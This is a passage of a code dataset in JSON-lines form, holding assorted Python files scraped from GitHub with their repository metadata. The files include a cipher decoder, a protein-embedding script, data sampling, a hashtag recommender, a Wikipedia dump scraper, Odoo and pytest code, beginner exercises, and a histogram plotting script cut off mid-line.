\"__main__\":\n answer1 = solution([4,3,2,1])\n answer2 = solution([10])\n\n print(f\"{answer1} : {answer1 == [4,3,2]}\")\n print(f\"{answer2} : {answer2 == [-1]}\")\n","repo_name":"shhommychon/CodingSkillTest-old","sub_path":"Python/YSDA02_semester1/00_just_for_practice/023_prgkr_removeminnum.py","file_name":"023_prgkr_removeminnum.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73492511801","text":"import numpy as np\r\nimport math\r\n\r\n# Bigram frequencies \r\nM = np.zeros((27,27))\r\nwith open(\"AustenCount.txt\") as f:\r\n lines = f.readlines()\r\n for i, l in enumerate(lines):\r\n row = l.split()\r\n for j, val in enumerate(row):\r\n M[i,j] = int(val)\r\n\r\nlogM = np.log(M.astype(int) + 1)\r\n\r\n# text to decode\r\ntext = \"\"\r\nwith open(\"f_9.txt\") as f:\r\n text = f.readline()\r\n\r\n# coversions from text to numbers\r\nalphabet = list(\"abcdefghikjlmnopqrstuvwxyz \")\r\nasciiVals = {i: val for i, val in enumerate(alphabet)}\r\nasciiValsReverse = {val: i for i, val in enumerate(alphabet)}\r\n\r\n# calculates score given text\r\ndef score(currentVals):\r\n arr = np.array(list(currentVals))\r\n arr = np.vectorize(asciiValsReverse.__getitem__)(arr)\r\n arr_unshift = arr[:len(arr) - 1]\r\n arr_shift = arr[1:] # shape ex (50), get to (50, 2)\r\n\r\n arr_unshift = np.expand_dims(arr_unshift, axis=1)\r\n arr_shift = np.expand_dims(arr_shift, axis=1)\r\n arr_combined = np.append(arr_unshift, arr_shift, axis=1)\r\n\r\n arr_more = np.apply_along_axis(lambda a: logM[a[0], a[1]], 1, arr_combined)\r\n\r\n return np.sum(arr_more)\r\n\r\n# given a matrix for swaps, this will return the potentially decoded text\r\ndef getAnswer(text, chooser):\r\n newtext = \"\"\r\n for t in text:\r\n newtext = newtext + asciiVals[chooser[asciiValsReverse[t]]]\r\n \r\n return newtext\r\n\r\n\r\n# chooser with no swaps\r\nchooser = np.arange(27)\r\n\r\n# score before starting\r\npreScore = score(getAnswer(text, chooser))\r\n\r\nfor i in range(1,50001):\r\n chosen = np.random.choice(np.arange(27), 2, replace=False)\r\n preChooser = chooser.copy()\r\n\r\n chooser[chosen[0]] = preChooser[chosen[1]]\r\n chooser[chosen[1]] = preChooser[chosen[0]]\r\n\r\n calcScore = score(getAnswer(text, chooser))\r\n uni = np.random.uniform(size=1)[0]\r\n\r\n # if score is below 0 it can be ignored, and if it is above 100 it will go through\r\n scoreDif = 0\r\n if (calcScore - preScore > 0):\r\n if (calcScore - preScore > 100):\r\n scoreDif = 100\r\n else:\r\n print(calcScore - preScore)\r\n scoreDif = math.exp(calcScore - preScore)\r\n\r\n if uni < scoreDif:\r\n preScore = calcScore\r\n else:\r\n chooser = preChooser.copy()\r\n \r\n if i % 1000 == 0:\r\n print(\"~~~\")\r\n print(getAnswer(text, chooser))\r\n print(\"~~~\")\r\n","repo_name":"kazar4/APMA-1941D-Project","sub_path":"project1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24783522302","text":"import torch\nfrom transformers import T5EncoderModel, T5Tokenizer, AutoModel, pipeline\nimport re\nimport numpy as np\nimport json\nfrom pathlib import Path\nimport os\nimport requests\nfrom tqdm.auto import tqdm\nimport gc\n\n\nif __name__ == '__main__':\n model_name = 'prot_t5_xl_uniref50'\n data_split = 'valid'\n tokenizer = T5Tokenizer.from_pretrained(f\"Rostlab/{model_name}\", do_lower_case=False)\n model = T5EncoderModel.from_pretrained(f\"Rostlab/{model_name}\")\n gc.collect()\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model = model.to(device)\n model = model.eval()\n\n with open(f'./data/fsmol/prot_map_{data_split}.json', 'r') as f:\n prot_map = json.load(f)\n\n prots, assays = [], []\n for key, val in prot_map.items():\n prots.append(val)\n assays.append(key)\n\n seqs = [[c for c in prot] for prot in prots]\n spaced_seqs = [' '.join(seq) for seq in seqs]\n filtered_seqs = [re.sub(r\"[UZOB]\", \"X\", sequence) for sequence in spaced_seqs]\n idx = 0\n batch_size = 1\n all_embeds = []\n while idx < len(filtered_seqs):\n end = min(idx + batch_size, len(filtered_seqs))\n batch = filtered_seqs[idx: end]\n idx = end\n ids = tokenizer.batch_encode_plus(batch, add_special_tokens=True, padding=True)\n input_ids = torch.tensor(ids['input_ids']).to(device)\n attention_mask = torch.tensor(ids['attention_mask']).to(device)\n with torch.no_grad():\n embedding = model(input_ids=input_ids, attention_mask=attention_mask)\n embedding = embedding.last_hidden_state.cpu().numpy()\n features = []\n\n # Remove padding (\\) and special tokens (\\) that is added by ProtT5-XL-UniRef50 model\n for seq_num in range(len(embedding)):\n seq_len = (attention_mask[seq_num] == 1).sum()\n seq_emd = embedding[seq_num][:seq_len - 1]\n features.append(seq_emd)\n\n protein_features = [np.mean(tokens, axis=0) for tokens in features]\n all_embeds.extend(protein_features)\n to_save = {}\n for assay_id, embed in zip(assays, all_embeds):\n to_save[assay_id] = embed\n np.savez_compressed(f'./non_averaged_prot_embeds_fsmol_{data_split}', **to_save)\n","repo_name":"nkami/cfom","sub_path":"embed_prot.py","file_name":"embed_prot.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8694013763","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm import tqdm\n\n\n# In[2]:\n\n\ndf = pd.read_csv('Data.csv')\n\ndf2 = df[pd.notna(df['Sector'])]\ndf2 = df2[pd.notna(df2['Query Type'])]\n\ndf = df2\ndf = df.reset_index(drop=True)\n\n\n# In[3]:\n\n\n# Plant Protection + Nutrient Management + Disease Management\n# Weather + Sowing Time and Weather\n# Government Schemes\n# Cultural Practices\n# Fertilizer Use and Availability\n# Agriculture Mechanization\n# Seeds and Planting Material + Seeds\n# Weed Management\n# Credit\n# Fishery Nutrition\n\n# Final Query_Type dictionary\nDict = {}\nDict['Nutrient Management'] = 'Plant Protection'\nDict['Plant Protection'] = 'Plant Protection'\nDict['Disease Management'] = 'Plant Protection'\nDict['Sowing Time and Weather'] = 'Weather'\nDict['Government Schemes'] = 'Government Schemes'\nDict['Cultural Practices'] = 'Cultural Practices'\nDict['Fertilizer Use and Availability'] = 'Fertilizer Use and Availability'\nDict['Cultural Practices'] = 'Cultural Practices'\nDict['Agriculture Mechanization'] = 'Agriculture Mechanization'\nDict['Seeds and Planting Material'] = 'Seeds'\nDict['Seeds'] = 'Seeds'\nDict['Weed Management'] = 'Weed Management'\nDict['Credit']='Credit'\nDict['Fishery Nutrition']='Fishery Nutrition'\n\n\n# In[4]:\n\n\nsampled_df = df[df['Query Type']=='Fishery Nutrition']\nfor qt in Dict.keys():\n if qt == 'Fishery Nutrition':\n continue\n df1 = df[df['Query Type']==qt]\n# print(qt, len(df1))\n df1 = df1.sample(frac=1)\n sampled_df = sampled_df.append(df1[:1000])\n \nsampled_df = sampled_df.reset_index(drop=True)\n \nfor i in range(len(sampled_df)):\n sampled_df['Query Type'][i] = Dict[sampled_df['Query Type'][i]]\n \nsampled_df.to_csv('final_sampled_data.csv',index=False)\n\n\n# In[5]:\n\n\nsampled_df = df[df['Sector']=='FISHERIES']\nfor qt in set(df['Sector']):\n if qt == 'FISHERIES':\n continue\n df1 = df[df['Sector']==qt]\n# print(qt, len(df1))\n df1 = df1.sample(frac=1)\n sampled_df = sampled_df.append(df1[:2500])\nsampled_df.to_csv('sector_sampled_data.csv',index=False)\n\n","repo_name":"neilrs123/Kisan-Query-Analysis","sub_path":"src/Classification/1_Data_Analysis_and_Data_Cleaning.py","file_name":"1_Data_Analysis_and_Data_Cleaning.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17813786107","text":"import numpy as np\r\nimport pandas as pd\r\nimport Preproce\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nimport json\r\nimport pdb\r\nfrom tqdm import tqdm\r\n\r\ntrainSet = './data/trainSet.txt'\r\ntestSet = './data/testSet.txt'\r\ncontentEmb = './data/embeddings.json'\r\ntagEmb = './data/tagEmb.txt'\r\nuserEmb = './data/userEmb.txt'\r\ntrain_df = pd.read_table(trainSet)\r\ntest_df = pd.read_table(testSet)\r\ntrain_df['hashtag'] = train_df['content'].apply(Preproce.get_hashtag)\r\ncontent_user_df = train_df.groupby(['user_id'], as_index=False).agg({'content': lambda x: list(x)})\r\ncontent_tag_df = train_df.explode('hashtag').groupby(['hashtag'], as_index=False).agg({'content': lambda x: list(x)})\r\nuser_tag_df = train_df.explode('hashtag').groupby(['user_id'], as_index=False).agg({'hashtag': lambda x: list(x)})\r\nuser_list = list(set(train_df['user_id'].tolist())) # [0:2000]\r\nTag_df = train_df.explode('hashtag')\r\nTag_list = list(set(Tag_df['hashtag'].tolist()))[1:]\r\n# Tag_list.remove('nan')\r\n# 读取content_emb文件给con_emb_dict赋值user_tag_lis\r\n\r\n##############################################################################\r\npopular_tag_df = pd.read_table('./data/countTag.txt')\r\npopular_tag_lis = []\r\nfor i in range(500):\r\n popular_tag_lis.append(popular_tag_df['hashtag'].loc[i])\r\n##############################################################################\r\n\r\nwith open(\"data/embeddings.json\", \"r\") as f:\r\n con_emb_dict = json.load(f)\r\n\r\n\r\ndef cal_upper_bound(user_lis):\r\n user_test_df = test_df\r\n user_test_df['hashtag'] = user_test_df['content'].apply(Preproce.get_hashtag)\r\n\r\n print(user_test_df['hashtag'])\r\n'''\r\n success = 0\r\n for user in user_lis: # 重复出现的user要记得筛掉\r\n # print('score of tag rec for: '+user)\r\n spec_tag_lis = popular_tag_lis\r\n # spec_tag_lis = user_tag_df['hashtag'].loc[user_tag_df['user_id'] == user].tolist()[0]\r\n print(spec_tag_lis)\r\n each = 0\r\n test_tag_lis = user_test_df['hashtag'].loc[user_test_df['user_id'] == user].tolist()\r\n print(test_tag_lis)\r\n for tag in spec_tag_lis:\r\n if tag in test_tag_lis:\r\n success += 1\r\n each += 1\r\n break\r\n print(each)\r\n\r\n print(\"history upper bound: \" + str(success / len(user_list)))\r\n'''\r\n\r\n\r\n# basic layer\r\ndef content_embedding(content):\r\n try:\r\n return con_emb_dict[content]\r\n except:\r\n return [0] * 768\r\n\r\n\r\n# second layer\r\ndef average_user_tweet(user_lis):\r\n user_arr_dict = {}\r\n for user in user_lis:\r\n embed_list = []\r\n content_list = content_user_df['content'].loc[content_user_df['user_id'] == user].tolist()[0]\r\n for content in content_list:\r\n embed_list.append(content_embedding(content))\r\n embed_list = np.mean(np.array(embed_list), axis=0) # (768, )\r\n user_arr_dict[user] = embed_list\r\n\r\n return user_arr_dict\r\n\r\n\r\n# second layer\r\ndef average_hashtag_tweet(tag_lis):\r\n tag_arr_dict = {}\r\n for tag in tag_lis:\r\n embed_list = []\r\n try:\r\n content_list = content_tag_df['content'].loc[content_tag_df['hashtag'] == tag].tolist()[0]\r\n except:\r\n pdb.set_trace()\r\n for content in content_list:\r\n embed_list.append(content_embedding(content))\r\n embed_list = np.mean(np.array(embed_list), axis=0) # (768, )\r\n tag_arr_dict[tag] = embed_list\r\n\r\n return tag_arr_dict\r\n\r\n\r\ndef cosine_similar(user, hashtag, user_arr_dict, tag_arr_dict):\r\n return float(cosine_similarity(user_arr_dict[user].reshape(1, -1), tag_arr_dict[hashtag].reshape(1, -1)))###############################\r\n\r\n\r\ndef rank_hashtag():\r\n # dictionary to return hashtag recommendation score to all user\r\n spe_user_cos_list = []\r\n\r\n user_arr_dict = average_user_tweet(user_list)\r\n tag_arr_dict = average_hashtag_tweet(Tag_list)\r\n\r\n for user in tqdm(user_list):\r\n cosine_list = []\r\n spec_tag_lis = user_tag_df['hashtag'].loc[user_tag_df['user_id'] == user].tolist()[0]\r\n print(str(user)+': '+str(len(spec_tag_lis)))\r\n for tag in spec_tag_lis:\r\n if str(tag) != 'nan':\r\n # print('yes')\r\n cosine_list.append(cosine_similar(user, tag, user_arr_dict, tag_arr_dict))\r\n # tag_cos_dict = OrderedDict()\r\n tag_cos_dict = dict(zip(cosine_list, spec_tag_lis))\r\n tag_cos_dict = sorted(tag_cos_dict.items(), reverse=True)\r\n # print(tag_cos_dict)\r\n spe_user_cos_list.append(tag_cos_dict)\r\n\r\n rank_dict = dict(zip(user_list, spe_user_cos_list))\r\n return rank_dict\r\n\r\n\r\ndef embedding_rec(user, rank_dict):\r\n '''\r\n t1, t2 = rank_dict[user][0][1]\r\n if isinstance(t1, str):\r\n return [t1]\r\n else:\r\n return [t2]\r\n '''\r\n tag_lis = []\r\n for i in range(5):\r\n try:\r\n tag_lis.append(rank_dict[user][i][1])\r\n except:\r\n tag_lis.append('None')\r\n print(tag_lis)\r\n # rank_dict[user][0][1]返回tuple(cosine_sim, hashtag)中的hashtag, cosine_sim是float,hashtag是str\r\n return tag_lis\r\n # return str(rank_dict[user][0][1])\r\n\r\n\r\ndef eval_rec(user_lis):\r\n # calculate the whole rec dict of cosine_similarity of each hashtag to each user\r\n rank_dict = rank_hashtag()\r\n user_test_df = test_df.drop(['tweet_id', 'time', 'hashtag'], axis=1)\r\n\r\n success = 0\r\n for user in user_lis: # 重复出现的user要记得筛掉\r\n # print('score of tag rec for: '+user)\r\n tag_lis = embedding_rec(user, rank_dict)\r\n test_tag_lis = Preproce.get_hashtag(user_test_df[user_test_df['user_id'] == user]['content'])\r\n for tag in tag_lis:\r\n if tag in test_tag_lis:\r\n success += 1\r\n break\r\n\r\n print(\"embedding recommendation: \" + str(success / len(user_list)))\r\n\r\n\r\nif __name__ == '__main__':\r\n # eval_rec(user_list)\r\n cal_upper_bound(user_list)\r\n '''\r\n a = ['user1', 'user2', 'user3']\r\n b = ['tag1', 'tag2', 'tag3', 'tag4']\r\n c = ['3', '2', '1', '4']\r\n d1 = OrderedDict()\r\n d1 = dict(zip(b, c))\r\n print(d1)\r\n '''\r\n\r\n '''\r\n d2 = dict(zip(b, c))\r\n d3 = dict(zip(b, c))\r\n d = [d1, d1, d3]\r\n e = dict(zip(a, d))\r\n print(e)\r\n '''\r\n\r\n","repo_name":"CelestineZYJ/Per-tag-Rec","sub_path":"BertTrec.py","file_name":"BertTrec.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"39612069366","text":"import os\nimport csv\n\nfrom BeautifulSoup import BeautifulSoup\nimport urllib2\n\n\n\n##########################################################################\n## Module Constants\n##########################################################################\n\nDIRNAME = os.path.dirname(__file__)\nDATAPATH = os.path.join(DIRNAME,'wikiFilesUpdate.csv')\nOUTPATH = os.path.join(DIRNAME, 'wikiFileCurrent.csv')\n\nfield_names = [\"Language\", \"Code\", \"Wiki\", \"Base_url\"]\nwiki_url = \"http://dumps.wikimedia.org/backup-index.html\"\n\n##########################################################################\n## Modules\n##########################################################################\n\n# This function reads a CSV file and loads content into a dictionary.\ndef read_file_location(path, fieldnames):\n\twith open(path, 'rU') as data:\n\t\treader = csv.DictReader(data, fieldnames = fieldnames)\n\t\tfor row in reader:\n\t\t\tyield row\t\n\t\t\t\n# This function takes a url for an html page and returns a beautiful soup object\ndef get_soup(url):\n\thtml_page = urllib2.urlopen(url)\n\tsoup = BeautifulSoup(html_page)\n\treturn soup\t\n\t\t\t\n\n\t\n##########################################################################\n## Program takes list of wikipedia languages and obtains the url for the\n## location of the back-up files for each language and creates a CSV with this information\n##########################################################################\n\nif __name__ == \"__main__\":\n\t\n\t#Generate the list of all wiki project locations\n\tsoup = get_soup(wiki_url)\n\tlink_list = [link.get(\"href\") for link in soup.findAll(\"a\")]\n\t\n\t#Create csv file for results\n\twith open(OUTPATH, 'wb') as f:\n\t\tdict_writer = csv.DictWriter(f, field_names)\n\t\n\t\t#Add the most current wiki project location for each language\n\t\tfor idx, row in enumerate(read_file_location(DATAPATH, field_names)): \n\t\t\tfor link in link_list:\t\t\t\t\n\t\t\t\tif \"/\" + row['Wiki'] + \"/\" in \"/\" + link:\n\t\t\t\t\trow['Base_url']=link\n\t\t\t\t\tdict_writer.writerow(row)\n\t\t\t\t\tidx = idx + 1\n\t\t\t\n\t\t\t\t\n\t\t\n\t\t\t\n\t\n\t\t\t\n\t\t\t\n\n","repo_name":"Pythonsgo/DP-Tutorial","sub_path":"WikiSheetCSV.py","file_name":"WikiSheetCSV.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"38811291331","text":"import pathlib\n\nimport common\nimport polytwisters\n\n\ndef main():\n out_directory = pathlib.Path(\"./out/meshes\")\n out_directory.mkdir(exist_ok=True)\n w = 0.15\n for i, polytwister in len(polytwisters.ALL_HARD_POLYTWISTERS):\n name = polytwister[\"names\"][0].replace(\" \", \"_\")\n print(f'Exporting polytwister \"{name}\" ({i + 1}/{len(polytwisters.ALL_HARD_POLYTWISTERS)})...')\n args = [\n name,\n str(w),\n \"--normalize\",\n \"--mesh-out\",\n str(out_directory / f\"{name}_{w:.5}.stl\"),\n ]\n common.run_blender_script([], args)\n print(f'Polytwister \"{name}\" exported ({i + 1}/{len(polytwisters.ALL_HARD_POLYTWISTERS)})')\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"nhthn/polytwisters","sub_path":"export_meshes.py","file_name":"export_meshes.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"70210502841","text":"import pytest\n\nfrom pyvmc.core import periodic_bc\nfrom pyvmc.core.orbitals import Bands\nfrom pyvmc.core.lattice import Lattice\nfrom pyvmc.core.subsystem import SimpleSubsystem\nfrom pyvmc.core.wavefunction import FreeFermionWavefunction\nfrom pyvmc.core.walk import WalkPlan\nfrom pyvmc.core.measurement import BasicMeasurementPlan\nfrom pyvmc.library.renyi import RenyiModPossibleWalkPlan, RenyiSignWalkPlan, RenyiModPossibleMeasurementPlan, RenyiSignMeasurementPlan\n\ndef test_walk_plan_json():\n lattice = Lattice([24, 2])\n wf = FreeFermionWavefunction(lattice=lattice, orbitals=[Bands([9, 3], [periodic_bc, periodic_bc])])\n subsystem = SimpleSubsystem([8, 2], lattice)\n\n renyi_modpossible_plan = RenyiModPossibleWalkPlan(wf, subsystem)\n assert WalkPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n assert RenyiModPossibleWalkPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n\n renyi_sign_plan = RenyiSignWalkPlan(wf, subsystem)\n assert WalkPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n assert RenyiSignWalkPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n\n with pytest.raises(Exception):\n RenyiSignWalkPlan.from_json(renyi_modpossible_plan.to_json(), wf)\n\ndef test_measurement_plan_json():\n lattice = Lattice([24, 2])\n wf = FreeFermionWavefunction(lattice=lattice, orbitals=[Bands([9, 3], [periodic_bc, periodic_bc])])\n subsystem = SimpleSubsystem([8, 2], lattice)\n\n renyi_modpossible_plan = RenyiModPossibleMeasurementPlan(wf, subsystem)\n assert BasicMeasurementPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n assert RenyiModPossibleMeasurementPlan.from_json(renyi_modpossible_plan.to_json(), wf) == renyi_modpossible_plan\n\n renyi_sign_plan = RenyiSignMeasurementPlan(wf, subsystem)\n assert BasicMeasurementPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n assert RenyiSignMeasurementPlan.from_json(renyi_sign_plan.to_json(), wf) == renyi_sign_plan\n\n with pytest.raises(Exception):\n RenyiSignMeasurementPlan.from_json(renyi_modpossible_plan.to_json(), wf)\n","repo_name":"garrison/vmc","sub_path":"pyvmc/tests/library/test_renyi.py","file_name":"test_renyi.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"36068857850","text":"from odoo import models\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n def action_invoice_create(self, grouped=False, final=False):\n invoice_ids = super().action_invoice_create(\n grouped=grouped, final=final)\n invoices = self.env['account.invoice'].browse(invoice_ids)\n for invoice in invoices:\n for line in invoice.invoice_line_ids:\n if line.quantity == 0:\n line.unlink()\n pickings = invoice.mapped(\n 'invoice_line_ids.move_line_ids.picking_id')\n invoice.picking_ids = [(6, 0, pickings.ids)]\n if sum(invoice.mapped('invoice_line_ids.quantity')) == 0:\n invoice.unlink()\n return invoice_ids\n","repo_name":"treytux/trey-addons","sub_path":"sale_invoice_picking_date_limit/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"19663101928","text":"#Consider the searching problem\n#Input: List of integers, and value v\n#Output: An index i such that v = A[i] or -1 if v does not appear\n#Code for linear search\n\ndef linear_search(A, v):\n for i in range(len(A)):\n if A[i] == v:\n return i\n return -1\n\nif __name__ == \"__main__\":\n A = [1,2,3]\n print(\"A is \", A)\n print(\"The index of 4 in A is \", linear_search(A, 4))\n print(\"The index of 2 in A is \", linear_search(A,2))","repo_name":"zmatteson/clrs-algorithm","sub_path":"chapter_2/exercices/2_1_3.py","file_name":"2_1_3.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1434411075","text":"# -*- coding: utf-8 -*-\n\nimport argparse\n\nfrom logging import getLogger\n\nimport util\n\nlogger = getLogger(__name__)\n\n\ndef download(conf, args):\n \"\"\"\n\n :param CoreConf conf:\n :param args:\n :return:\n \"\"\"\n repositories = [x.baseurl for x in conf.repository_list if x.baseurl]\n for art in args.artifacts:\n v = art.split(':')\n util.download_package(repositories, v[0], v[1], \".\", v[2])\n return (True, None)\n\n\ndef setup_subcmd(subparsers):\n get_parser = subparsers.add_parser('download', help=\"Get single artifact\")\n get_parser.add_argument('artifacts', nargs='+')\n get_parser.set_defaults(handler=download)\n","repo_name":"nishemon/marun","sub_path":"marun/sub_get.py","file_name":"sub_get.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6825332476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 16 16:27:03 2019\n\n@author: Aryan Singh\n\"\"\"\n\n'''\n\n To begin, let’s consider the children’s game Hot Potato. \n In this game (see Figure 2) children line up in a circle \n and pass an item from neighbor to neighbor as fast as \n they can. At a certain point in the game, the action \n is stopped and the child who has the item (the potato) \n is removed from the circle. Play continues until only \n one child is left.\n\n'''\n\n# importing the python queue\nimport queue\n\ndef hot_potato(nameList, num):\n \n q = queue.Queue(maxsize=20) \n for name in nameList:\n q.put(name)\n \n while q.qsize()>1:\n for i in range(num):\n q.put(q.get())\n \n q.get()\n \n return q.get()\n\nprint(hot_potato([\"Bill\",\"David\",\"Susan\",\"Jane\",\"Kent\",\"Brad\"],7)) ","repo_name":"aryan-eth/All-About-Python","sub_path":"basics/hotPotato.py","file_name":"hotPotato.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"33967338477","text":"# coding=utf-8\n\n# 查找具体的文件夹,文件名或者文件包含特定字符.\n# 如果要查找文件,那个文件夹中不能包含特定字符\n# 如果要查找文件夹,那个文件中不能包含特定字符\n# 如果要查找的文件夹和文件包含一样的特殊字符,可以使用\n\nimport os\n\ndirs = [\n 'z:\\\\AFR',\n 'z:\\\\ANZ',\n 'z:\\\\ASP',\n 'z:\\\\Deadwood',\n 'z:\\\\DOW30',\n 'z:\\\\EUR',\n 'z:\\\\FTSE100',\n 'z:\\\\IPM',\n 'z:\\\\LTA',\n 'z:\\\\NRA',\n 'z:\\\\UKI',\n]\n\n# dirs = [\n# 'D:\\QA\\GEDF\\GEDataFeed-master\\GEDF\\MOCAL4169',\n# 'D:\\QA\\GEDF\\GEDataFeed-master\\GEDF\\MOCAL4892'\n# ]\n\nspecify_daily = 'Daily'\nspecify_monthly = 'Monthly'\nspecify_delta = 'Delta'\n\n\ndef process(dir):\n print(\"开始运行 %s\" % dir)\n results = []\n folders = [dir]\n for folder in folders:\n # 把目录下所有文件夹存入待遍历的folders\n folders += [os.path.join(folder, x) for x in os.listdir(folder)\n if os.path.isdir(os.path.join(folder, x))]\n\n results += [os.path.relpath(folder, start=dir) # os.path.relpath(os.path.join(folder, x) 这种方式获取��件的路径\n for x in os.listdir(folder)\n if os.path.isfile(os.path.join(folder, x))\n and (specify_daily in x or specify_monthly in x or specify_delta in x)]\n return results\n\n\ndef persistent_data(results):\n print(\"开始输出\")\n set_r = set(results)\n with open('resource/special_path.dat', 'a+') as f:\n for result in set_r:\n f.write(result+\"\\n\")\n for result in set_r:\n print(result)\n print('找到 %s 个结果!' % len(set_r))\n\n\nfor d in dirs:\n rs = process(d)\n persistent_data(rs)","repo_name":"atomicbombvendor/LearnPythonHardWay3","sub_path":"test/FindSpecialPath.py","file_name":"FindSpecialPath.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12916939853","text":"class Solution(object):\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n mapping = {\n ')': '(',\n '}': '{',\n ']': '[',\n }\n n = len(s)\n stack = list()\n for i in range(n):\n v = s[i]\n if v in mapping.keys() and stack and mapping[v] == stack[-1]:\n stack.pop()\n else:\n stack.append(v)\n return True if not stack else False\n","repo_name":"albertmenglongli/Algorithms","sub_path":"LeetCode/lc_020_ValidParentheses.py","file_name":"lc_020_ValidParentheses.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"19003661874","text":"## This script reads in 2D histogram data in csv.format,\n## i.e. number of samples per bin, where number of bins is given by number of rows\n## times number of cols.The rows give bins in range (-xrange, xrange)+bias_x, \n## the cols bins in range (-yrange, yrange)+bias_y. xrange, yrange and the biasses, \n## as well as temperature needs to be specified below.\n## Read in data, normalize histogram, print histogram and true density, and print\n## distributional error vs h (if activated).\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom matplotlib.ticker import LogLocator\nimport csv\nfrom cycler import cycler\n# from integrators_tests import dist_diff\nfrom GM_functions import posterior_plot\nfrom GM_functions import gaussmix\nfrom matplotlib import cm\n\n# plt.close('all')\n# plt.rcParams.update({'font.size': 33})\n# plt.rc('legend', fontsize=33) # legend fontsize\n# plt.rcParams['axes.grid'] = True\n# plt.rc('lines', linewidth=3)\n# plt.rcParams['axes.titlepad'] = 25\n\n#%%\n \nx_range = 1 # configuration interval (-x_range, x_range) where densities are notably > 0\nbias_x = 5\ny_range = 1\nbias_y = 0\n\nT=1\nh=\"0.025\"\nL=1\n# rho = config_density_HO\n\nplotrange = (-0.07,0.07)\nname = \"/home/rene/PhD/Research/code/Integrators/GM/histo_OBABO_\" # file name head to read\ntitle = r\" Harmonic Oscillator Sampling with OBABO\"\n\nfiles = [\"h0.050\"]\nlabels = [r\"$h$=0.05\"]\n\n\n# colors = [\"b\", \"orange\", \"g\", \"c\"]\ncolors = [\"c\"]\n\ndist_mse = []\nfig, ax = plt.subplots()\n\nfor (file, label, c) in zip(files,labels, colors):\n print(name+file)\n with open(name+file) as csv_file:\n\n csv_reader = csv.reader(csv_file, delimiter=' ')\n # rowct = 0\n # for row in csv_reader: # count rows\n # rowct += 1\n # bin_ctrs = np.zeros((rowct,rowct))\n bin_ctrs = []\n for row in csv_reader:\n bin_ctrs += [[int(i) for i in row[0:-1]]]\n \n nr_bins = len(bin_ctrs) - 2\n bin_ctrs = np.array(bin_ctrs)\n # dist_mse += [dist_diff(bin_ctrs, nr_bins, (-1*x_range, x_range), rho, (T))] \n\n # plot histograms\n delta_x = 2*x_range / nr_bins # width of bins\n delta_y = 2*y_range / nr_bins\n histo = bin_ctrs / (np.sum(bin_ctrs)*delta_x*delta_y) # normalize\n # midx = np.arange(-x_range+bias_x + 0.5*delta_x, x_range+bias_x, delta_x) # center of bins in x\n # midy = np.arange(-y_range+bias_y + 0.5*delta_y, y_range+bias_y, delta_y) # center of bins in y \n # ax.plot(midx, histo[1:-1], c, label=label )\n plt.imshow(histo[1:-1,1:-1], cmap=cm.jet, extent=(bias_x-x_range,bias_x+x_range,\n bias_y+y_range,bias_y-y_range))\n plt.colorbar()\n\n\n# plot density and finalize plot \n# rho = rho(midx, T)\n# # rho = rho(midx, T)\n# ax.plot(midx, rho, linestyle= \"dashdot\", c=\"k\", alpha=0.7, label=r\"$\\rho_{{\\beta}}$\")\n# ax.set_xlabel(r\"$\\theta$\")\n# ax.set_ylabel(r\"Occurence Frequency\")\n# ax.set_xlim(plotrange)\n# fig.suptitle(title, y=0.95)\n# ax.legend()\n#%%\n# plot distribution error\n# fig2, ax2 = plt.subplots()\n# # h_axis = [float(h) for h in hs]\n# N_axis = [float(N[2:]) for N in Ns]\n# c=\"r\"\n# ax2.scatter(np.log10(N_axis), np.log10(dist_mse), s=80, 